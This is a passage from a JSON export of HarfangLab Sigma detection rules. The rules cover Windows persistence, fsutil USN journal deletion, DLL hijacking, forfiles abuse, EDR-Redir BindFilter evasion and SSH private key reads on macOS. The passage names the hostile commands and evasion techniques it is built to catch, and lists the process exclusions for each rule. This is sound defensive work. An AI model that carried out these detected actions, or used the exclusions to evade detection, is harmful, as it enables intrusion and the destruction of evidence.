selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "374a5e08-3010-43b5-845f-e0fcb77c9017",
"rule_name": "Windows Universal Application Persistence Added",
"rule_description": "Detects the planting of a malicious debug path in universal Windows applications (UWP) known to start at logon (Cortana and People).\nUniversal Windows Platform (UWP) apps are applications designed to run across all Windows 10 and later devices, packaged in the AppX format, offering a unified development platform with security and performance features tailored for modern Windows environments.\nAdversaries may use it to establish persistence by executing malicious content at logon.\nIt is recommended to investigate the process at the origin of the registry modification as well as the files pointed to by the registry value to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "375c7801-69fe-493d-9e23-6069020b4ab2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087286Z",
"creation_date": "2026-03-23T11:45:34.087288Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087292Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://en.wikipedia.org/wiki/USN_Journal",
"https://attack.mitre.org/techniques/T1070/"
],
"name": "t1070_fsutil_deletejournal.yml",
"content": "title: USN Journal Deleted\nid: 375c7801-69fe-493d-9e23-6069020b4ab2\ndescription: |\n Detects the use of fsutil to delete the USN journal.\n The USN journal (Update Sequence Number Journal), is a feature of the Windows NT file system (NTFS) which maintains a record of changes made to the volume.\n The USN journal is an important forensic element.\n Attackers can use delete the USN to eliminate evidence of malicious activities.\n It is recommended to investigate the context of the execution and surrounding detections to determine if this action was legitimate.\nreferences:\n - https://en.wikipedia.org/wiki/USN_Journal\n - https://attack.mitre.org/techniques/T1070/\ndate: 2021/04/27\nmodified: 2025/02/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\fsutil.exe'\n - OriginalFileName: 'fsutil.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - ' usn '\n - ' deletejournal '\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "375c7801-69fe-493d-9e23-6069020b4ab2",
"rule_name": "USN Journal Deleted",
"rule_description": "Detects the use of fsutil to delete the USN journal.\nThe USN journal (Update Sequence Number Journal), is a feature of the Windows NT file system (NTFS) which maintains a record of changes made to the volume.\nThe USN journal is an important forensic element.\nAttackers can use delete the USN to eliminate evidence of malicious activities.\nIt is recommended to investigate the context of the execution and surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2025-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "37b3b3a7-8dd5-4cd9-a998-3a556640ecaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082521Z",
"creation_date": "2026-03-23T11:45:34.082523Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082528Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wecutil.yml",
"content": "title: DLL Hijacking via wecutil.exe\nid: 37b3b3a7-8dd5-4cd9-a998-3a556640ecaa\ndescription: |\n Detects potential Windows DLL Hijacking via wecutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wecutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\WecApi.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "37b3b3a7-8dd5-4cd9-a998-3a556640ecaa",
"rule_name": "DLL Hijacking via wecutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wecutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "380b79f2-50c9-423b-adc2-7ed80b4ba020",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088047Z",
"creation_date": "2026-03-23T11:45:34.088049Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088053Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_music_folder.yml",
"content": "title: DLL Loaded from Music Folder\nid: 380b79f2-50c9-423b-adc2-7ed80b4ba020\ndescription: |\n Detects the suspicious loading of a DLL from the Music folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to analyze the DLL as well as the process loading it to look for malicious content or subsequent malicious actions.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/08/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\\\*\\Music\\'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Corporation'\n - 'PIRIFORM SOFTWARE LIMITED' # CCleaner\n - 'Piriform Software Ltd' # CCleaner\n - 'Digital Wave Ltd' # FreeAudioConverter\n\n exclusion_landesk:\n ProcessImage:\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\LDISCN32.EXE'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\GatherProducts.exe'\n\n exclusion_musicbee:\n ProcessOriginalFileName: 'MusicBee.exe'\n ProcessCompany: 'Steven Mayall'\n\n exclusion_audacity:\n Image|endswith: '\\Audacity.exe'\n Signature: 'Musecy SM Ltd.'\n\n exclusion_musescore:\n Image|endswith: '\\MuseScore*.exe'\n\n exclusion_recexperts:\n Image|endswith:\n - '\\RecExperts.exe'\n - '\\infoforsetup.exe'\n - '\\virtualmonitorclient.exe'\n - '\\ffmpegprobe.exe'\n - '\\aliyunwrapexe.exe'\n - '\\firebasefetch.exe'\n Signature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_various_apps:\n Image|endswith:\n - '\\xmind.exe'\n - '\\libreofficeportable\\app\\libreoffice\\program\\soffice.bin'\n - '\\libreofficeportable\\app\\libreoffice\\program\\soffice.exe'\n\n exclusion_ditto:\n ProcessOriginalFileName: 'Ditto'\n ProcessInternalName: 'CP_Main'\n ImageLoaded|endswith: '\\Ditto-*\\Ditto\\\\*.dll'\n\n exclusion_garmin:\n Image: '?:\\Users\\\\*\\Music\\\\*\\Trainer\\G530SIM.exe'\n ImageLoaded|endswith: '\\Garmin\\\\*\\Trainer\\\\*.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "380b79f2-50c9-423b-adc2-7ed80b4ba020",
"rule_name": "DLL Loaded from Music Folder",
"rule_description": "Detects the suspicious loading of a DLL from the Music folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to analyze the DLL as well as the process loading it to look for malicious content or subsequent malicious actions.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-08-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3814d440-2491-4f45-aa78-9e73ec0e45d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070455Z",
"creation_date": "2026-03-23T11:45:34.070457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070464Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Forfiles/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_forfiles.yml",
"content": "title: Indirect Command Executed via forfiles.exe\nid: 3814d440-2491-4f45-aa78-9e73ec0e45d2\ndescription: |\n Detects the execution of the legitimate Windows binary forfiles.exe which is an utility to select files and run a command on them.\n Attackers may abuse it to bypass security restrictions or to execution malicious actions on whole folders or filesystems.\n It is recommended to investigate the commmand that was executed and the process reponsible for the execution for forfiles to determine whether this action is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Forfiles\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\forfiles.exe'\n ParentCommandLine|contains|all:\n - ' /p '\n - ' /m '\n - ' /c '\n exclusion_legitimate_usage:\n # Batch to delete, copy, move, ... files\n CommandLine|startswith:\n - '/c del '\n - '/c del/q'\n - '/c copy '\n - '/c xcopy '\n - '/c move '\n - '/c ren '\n - '/c mklink /D '\n - '/c erase /F '\n - '/c rmdir '\n - '/c echo '\n - '/c echo.' # winPEAS\n - '/c rd /s /q ?:'\n - '/c dir ?:'\n - '/c dir RMAN_BACKUP_'\n - '/c dir/S /b ?:'\n - '/c if TRUE==TRUE rd '\n - '/c if TRUE==TRUE RMDIR '\n - '/c if FALSE==TRUE rd /s /q ?:'\n - '/c if FALSE==TRUE echo '\n - '/c if TRUE==TRUE echo '\n - '/c if TRUE==FALSE del '\n - '/c if FALSE==FALSE echo '\n - '/c if TRUE==FALSE echo '\n - '/c if FALSE==FALSE del '\n - '/c ATTRIB -R -A -S -H ?:'\n - '/c IF TRUE == TRUE rmdir '\n - '/c IF TRUE == TRUE rd '\n - '/c IF TRUE == FALSE rmdir '\n - '/c IF TRUE == FALSE rd '\n - '/c IF FALSE == TRUE rmdir '\n - '/c IF FALSE == TRUE rd '\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe' # no conhost in syswow64 apparently\n # \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\n CommandLine|contains|all:\n - 'conhost.exe'\n - '0xffffffff'\n\n exclusion_xcopy:\n # Sometimes xcopy is called direclty instead of using cmd /c\n OriginalFileName: \"XCOPY.EXE\"\n\n exclusion_infectioguardian:\n Ancestors|contains: '\\ModuleUtils\\InfectioGuardian\\InfectioGuardian.exe|'\n\n exclusion_legitimate_actions:\n ParentCommandLine:\n # Compression\n - 'forfiles /p * /c cmd /c makecab @path @fname* && echo *@path ... && del @path'\n - 'forfiles /s * /c cmd /c 7z a @fname* @file'\n - 'forfiles /p * /c cmd /c *zip.exe *.zip @file'\n # Archiving\n - 'forfiles /p * -c cmd /c if @isdir gtr true move @path*'\n - 'forfiles /p * /c cmd /c dir @file'\n - 'forfiles /p * /c cmd /c type @file | more'\n - 'forfiles /p * /c cmd /cdir @path'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3814d440-2491-4f45-aa78-9e73ec0e45d2",
"rule_name": "Indirect Command Executed via forfiles.exe",
"rule_description": "Detects the execution of the legitimate Windows binary forfiles.exe which is an utility to select files and run a command on them.\nAttackers may abuse it to bypass security restrictions or to execution malicious actions on whole folders or filesystems.\nIt is recommended to investigate the commmand that was executed and the process reponsible for the execution for forfiles to determine whether this action is legitimate.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3827b403-b9e7-486d-bf89-c0024617c3ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624651Z",
"creation_date": "2026-03-23T11:45:34.624653Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_potential_bindfilter_redirection_usage.yml",
"content": "title: Potential BindFilter Redirection Usage\nid: 3827b403-b9e7-486d-bf89-c0024617c3ee\ndescription: |\n Detects the loading of specific DLLs related to BindFilter redirection mechanisms, which may indicate attempts to manipulate Windows filter driver bindings for filesystem redirection.\n EDR-Redir, a tool developed by TwoSevenOneT, is known to target EDR solutions by using a BindFilter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the EDR's working folder to a folder of the attacker's choice.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/11/03\nmodified: 2025/12/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.EDR-Redir\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded: '?:\\Windows\\System32\\bindfltapi.dll'\n ProcessParentImage|contains: '?'\n\n exclusion_svchost:\n Image: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n Image: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_dismhost:\n Image:\n - '?:\\$WinREAgent\\Scratch\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\$WINDOWS.~BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Windows\\SystemTemp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Windows\\System32\\Dism\\DismHost.exe'\n - '?:\\W10UIuup\\\\????????-????-????-????-????????????\\DismHost.exe'\n\n exclusion_wuaucltcore:\n Image: '?:\\Windows\\UUS\\\\*\\wuaucltcore.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_repaircenter:\n ProcessCommandLine: 'regsvr32.exe /s ?:\\WINDOWS\\system32\\\\*.dll'\n ProcessParentImage|endswith: '\\Yamicsoft\\RepairCenter.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3827b403-b9e7-486d-bf89-c0024617c3ee",
"rule_name": "Potential BindFilter Redirection Usage",
"rule_description": "Detects the loading of specific DLLs related to BindFilter redirection mechanisms, which may indicate attempts to manipulate Windows filter driver bindings for filesystem redirection.\nEDR-Redir, a tool developed by TwoSevenOneT, is known to target EDR solutions by using a BindFilter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the EDR's working folder to a folder of the attacker's choice.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2025-11-03",
"rule_modified_date": "2025-12-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3831a1a6-cce1-43aa-b3f7-73f2c207a8a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607792Z",
"creation_date": "2026-03-23T11:45:34.607796Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607803Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/004/"
],
"name": "t1552_004_ssh_private_key_read_macos.yml",
"content": "title: SSH Private Key Read (macOS)\nid: 3831a1a6-cce1-43aa-b3f7-73f2c207a8a4\ndescription: |\n Detects an attempt to read the content of an SSH private key.\n The private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\n An attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/004/\ndate: 2024/06/18\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path: '/Users/*/.ssh/*'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'read'\n\n filter_ssh:\n Image:\n - '/usr/bin/ssh'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/usr/bin/ssh-keygen'\n - '/usr/bin/ssh-add'\n - '/opt/homebrew/Cellar/openssh/*/bin/ssh'\n\n filter_benign:\n Path|endswith:\n - '/authorized_keys*'\n - '.pub'\n - 'config'\n - 'known_hosts'\n - '/.ssh/config'\n - '/.ssh/config-sb*'\n - '/env*'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/nix/'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_misc:\n Image|endswith:\n - '/python*'\n - '/ruby'\n - '/usr/bin/pico'\n - '/usr/bin/vim'\n\n exclusion_virtualmachine:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n exclusion_cyberduck:\n Image: '/Applications/Cyberduck.app/Contents/MacOS/Cyberduck'\n\n exclusion_dbeaver:\n Image: '/Users/*/Applications/DBeaver.app/Contents/MacOS/dbeaver'\n\n exclusion_xcode:\n Image:\n - 